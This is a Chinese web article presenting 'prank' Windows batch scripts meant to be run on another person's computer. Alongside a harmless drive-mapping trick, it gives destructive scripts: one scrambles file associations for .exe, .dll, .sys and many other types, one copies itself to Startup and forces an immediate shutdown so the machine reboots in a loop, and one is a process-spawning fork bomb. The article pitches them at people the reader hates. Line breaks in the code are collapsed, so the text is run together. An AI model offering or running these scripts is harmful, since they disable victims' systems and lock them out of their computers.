整人bat代码大全(bat整人代码教程)
大家好,小东方来为大家解答以上的问题。整人bat代码大全,bat整人代码教程这个很多人还不知道,现在让我们一起来看看吧!
1、这是一个恶搞程序,运行后会出现N个本地磁盘,但是对电脑没有什么实际伤害。
2、@echo offfor %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: C:)如果要解除就用这个@echo offfor %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: /d)如果你对对方恨之入骨就用这个,这个会把文件关联改的一团糟@echo offassoc .exe=txtfileassoc .txt=exefileassoc .mp3=txtfileassoc .flv=txtfileassoc .swf=txtfileassoc .fla=txtfileassoc .jpg=txtfileassoc .bmp=txtfileassoc .zip=txtfileassoc .7z=txtfileassoc .rar=txtfileassoc .tag=txtfileassoc .jpge=txtfileassoc .mp4=txtfileassoc .3gp=txtfileassoc .avi=txtfileassoc .wav=txtfileassoc .htm=txtfileassoc .html=txtfileassoc .vbs=txtfileassoc .vbe=txtfileassoc .js=txtfileassoc .rxproj=txtfileassoc .mdb=txtfileassoc .dll=txtfileassoc .dat=txtfileassoc .sys=txtfileassoc .wmv=txtfileassoc .ogg=txtfileassoc .db=txtfileassoc .mid=txtfileassoc .gif=txtfileassoc .png=txtfileassoc .doc=txtfileassoc .exl=txtfileassoc .pdf=txtfileassoc .chm=txtfileassoc .nfo=txtfile或者用这个@echo offcopy %0 "%ALLUSERSPROFILE%「开始」菜单程序启动" shutdown -s -f -t 0你也可以用这个超级弹窗程序吓吓他@echo offfor /l %%i in (1,1,10000) do (start %0)。
本文到此分享完毕,希望对大家有所帮助。
免责声明:本文由用户上传,如有侵权请联系删除!
猜你喜欢
- 12-27
- 12-27
- 12-27
- 12-27
- 12-27
- 12-27
- 12-27
- 12-27
最新文章
- 12-27
- 12-27
- 12-27
- 12-27
- 12-27
- 12-27
- 12-27
- 12-27